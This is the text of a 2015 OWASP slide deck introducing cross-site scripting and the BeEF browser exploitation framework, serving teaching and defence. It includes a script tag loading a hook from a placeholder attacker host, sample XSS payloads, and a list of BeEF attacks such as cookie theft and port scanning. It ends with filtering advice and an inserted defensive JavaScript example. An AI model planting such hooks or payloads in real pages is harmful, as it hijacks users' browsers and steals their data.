Introduction to Cross-Site Scripting with BeEF Presented to OWASP San Antonio at Denim Group Created by: Charles Neill Modified Date: 2/5/2015

Introduction to Cross-Site
Scripting with BeEF
Presented to OWASP San Antonio at
Denim Group
Created by: Charles Neill
Modified Date: 2/5/2015
What is cross-site scripting?
• Cross-Site Scripting (referred to as XSS) is a type of web application attack
where malicious client-side script is injected into the application output and
subsequently executed by the user’s browser
• TL;DR: Not filtering out HTML and JavaScript in user input = bad
• It can be used to take over a user’s browser in a variety of ways
Why should I care about cross-site scripting?
• There was a time not too long ago when XSS was considered a low-risk type of
security issue, because when compared to a server-side exploit, it seemed
relatively benign
• As other issues like PHP remote file inclusions have become harder to exploit,
XSS attacks have increased in prominence and sophistication
Trick question: Which is worse, popping up an alert box or popping root on a
server?
Who’s affected by cross-site scripting?
Everyone. No, really – almost every site you can think of has had XSS problems
at one time or another (and probably still does)
Don’t believe me?
• Universal XSS in Internet Explorer (2015) [1]
• Tweetdeck (2014) [2]
• PayPal (2013) – BONUS: discovered by a 17-year-old kid [3]
• Google Finance (2013) [4]
• 25 “Verisign-secured” online stores (2012) [5]
• McAfee (2011) [6]
• Visa (2010) [7]
Some sites you might recognize
[Screenshot: http://www.xssed.com/files/image/News/paypalevsslxss.PNG]
www.rackspace.com
Some sites you might recognize
[Screenshot: http://3.bp.blogspot.com/-IpLMWEVPnRc/UmYV_19hnNI/AAAAAAAADfc/caJdmBEsyaE/s1600/1.png]
Some sites you might recognize
[Screenshot: https://isc.sans.edu/diaryimages/youtube.png]
Boooooring…
The classic proof-of-concept for XSS is a little alert box with some arbitrary text in
it, or a picture of something silly. This doesn’t seem nearly dangerous enough to
warrant concern.
What else you got?
Introducing: BeEF
What’s BeEF? From their website (beefproject.com):
“BeEF is short for The Browser Exploitation Framework… BeEF looks past the hardened
network perimeter and client system, and examines exploitability within the context of the
one open door: the web browser.”
Where’s the BeEF?
• That description sounds scary, but what does it mean?
• Think of BeEF as a one-stop-shop to gain and retain control over a user’s
browser, and do whatever you want with it
• This is like Metasploit (metasploit.com) for the browser
– You can even use Metasploit’s “browser_autopwn” tests to try to take over the browser
How does one use BeEF? This is all it takes to insert into a page:
<script src=http://attacker/hook.js></script>
The BeEF Dashboard
• Monitor users by their IP, browser, OS
• See logs of their activity
• Trick the user into downloading malicious files
• Perform network reconnaissance
• And much more…
DEMO TIME!
(Get excited)
So many attacks, so little time
Basic Client-side Attacks
• Steal cookies
• Play a sound
• Get user-agent string
• See enabled plugins (e.g. Chrome PDF viewer, Java, etc.)
More Advanced Client-Side Attacks
• Man-in-the-browser
• Forge user requests
• Get form values / HTML contents
• Fake notifications (Chrome plugin bar, LastPass login, etc.)
• Tabnabbing
Lateral Movement / Network Exploration
• Port scanning
• Network mapping
• Execute local Redis commands
So what should I do to prevent XSS?
• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user
THANK YOU
RACKSPACE®
1 FANATICAL PLACE, CITY OF WINDCREST, SAN ANTONIO, TX 78218
US SALES: 1-800-961-2888 | US SUPPORT: 1-800-961-4454
WWW.RACKSPACE.COM
© RACKSPACE LTD. RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES.
So what should I do to prevent XSS? (No, really)
• Almost all client-side script injection comes down to the following characters:
<>(){}[]"';/\
• There are various ways to take care of these characters, but it is too context-dependent to give a one-size-fits-all answer
• The shortest answer is: make sure you’re only getting characters you expect
when a user enters any kind of information, and make sure you never display a
user-entered string without properly encoding it for the context it lands in
• Check out the links at the end of this presentation to learn more
Examples of XSS in code
Here’s some sample vulnerable JavaScript. See if you can spot the bad part.
<html>
<script>
var lol = function () {
var a = document.getElementById('a').value;
document.write(a);
}
</script>
<input type="text" name="a" id="a">
<input type="submit" onclick="lol();">
</html>
Examples of XSS in code
Hmm, there’s the problem…
<html>
<script>
var lol = function () {
var a = document.getElementById('a').value;
document.write(a); // Too easy
}
</script>
<input type="text" name="a" id="a">
<input type="submit" onclick="lol();">
</html>
Examples of XSS in code
Now for something a little more interesting. Remember that you also have to
account for the third-party libraries you’re using.
Some innocent-looking jQuery code:
$(location.hash) // Wait, that’s it?
Examples of XSS in code
You’re not only securing the code you write, but all the code you use…
$(location.hash) // WHERE’S THE VULNERABLE PART?!
Well, if we’re using jQuery 1.6.1 and we visit the page
http://app/#<img src=/ onerror=alert(1)>
…this will pop up one of those alert boxes [8].
Tips for filtering XSS
Here are some examples of how to filter HTML characters in a few simple
scenarios in PHP (there should be similar functions in any language; check the
links at the end of the PPT)
$int = intval($_GET['a']); // This will never return anything other than an integer
$str = htmlentities($_GET['b']); // This will encode any character for which there is
// an HTML entity equivalent (e.g. &gt; &lt; &quot;)
// This is NOT always enough! [9]
Getting around prevention measures
Pop quiz! What’s wrong with this PHP code:
echo('<a href="' . htmlentities($_GET['var']) . '">link</a>');
Getting around prevention measures
Pop quiz! What’s wrong with this PHP code:
echo('<a href="' . htmlentities($_GET['var']) . '">link</a>');
What if we set $_GET['var'] to javascript:alert(/xss/);
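As an added example (not code from the slides), here is the defensive side of the last several slides in Node.js-runnable JavaScript: HTML encoding for the document.write sink, a scheme allow list for the href pop quiz where htmlentities alone is not enough, and an id-only check for the $(location.hash) selector case. The function names, the allowed-scheme list and the sample inputs are assumptions made for this example.

```javascript
// Added example, not code from the slides. Runs under Node.js with no dependencies.
// Each function is the defensive counterpart of one slide: the document.write
// sink, the href pop quiz, and the $(location.hash) selector case.

// HTML body / quoted-attribute context: the five characters that let text break
// out into markup. Encoding them is what the slides mean by "properly encoding".
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// href context: javascript:alert(/xss/) contains none of the characters above, so
// htmlentities() leaves it intact and the link still executes on click. Accept only
// same-origin relative paths or absolute URLs whose scheme is on an allow list
// (assumed list; widen it only for schemes the application really needs).
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
function safeHref(untrusted) {
  const value = String(untrusted).trim();
  // "/path" is fine; "//host" and "/\host" would be protocol-relative, so exclude them.
  if (/^\/(?![\/\\])/.test(value)) return encodeHtml(value);
  try {
    const url = new URL(value); // normalises scheme case, so "JAVASCRIPT:" is caught too
    if (ALLOWED_SCHEMES.has(url.protocol)) return encodeHtml(url.href);
  } catch (e) {
    // not a parseable absolute URL; fall through to the inert default
  }
  return '#';
}

// Selector context: only hand the fragment to a selector engine when it is a plain
// element id. Anything else (markup, attribute selectors) is simply ignored.
const ID_FRAGMENT = /^#[A-Za-z][A-Za-z0-9_-]*$/;
function selectorFromHash(hash) {
  return ID_FRAGMENT.test(hash) ? hash : null;
}

// The link from the pop quiz, built with the right encoder for each context.
function renderLink(untrustedHref, untrustedText) {
  return `<a href="${safeHref(untrustedHref)}">${encodeHtml(untrustedText)}</a>`;
}
```

In the browser, the document.write slide is fixed the same way: either encode with encodeHtml before writing, or avoid the HTML sink entirely and assign the value to an element's textContent.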
QUESTIONS?
Resources
• OWASP Links
– Guide to Cross-site Scripting - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
– XSS Prevention Cheat Sheet - https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
– DOM based XSS Prevention Cheat Sheet - https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet
References
• [1] http://seclists.org/fulldisclosure/2015/Feb/0
• [2] http://techcrunch.com/2014/06/11/tweetdeck-fixes-xss-vulnerability/
• [3] http://threatpost.com/paypal-site-vulnerable-to-xss-attack
• [4] http://miki.it/blog/2013/7/30/xss-in-google-finance/
• [5] http://nakedsecurity.sophos.com/2012/02/28/verisign-xss-holes/
• [6] http://www.scmagazine.com/mcafee-working-to-fix-xss-information-disclosure-flaws/article/199505/
• [7] http://news.softpedia.com/news/XSS-Weakness-Found-on-Visa-USA-Website-157115.shtml
• [8] http://ma.la/jquery_xss/
• [9] http://en.wikipedia.org/wiki/List_of_XML_and_HTML_character_entity_references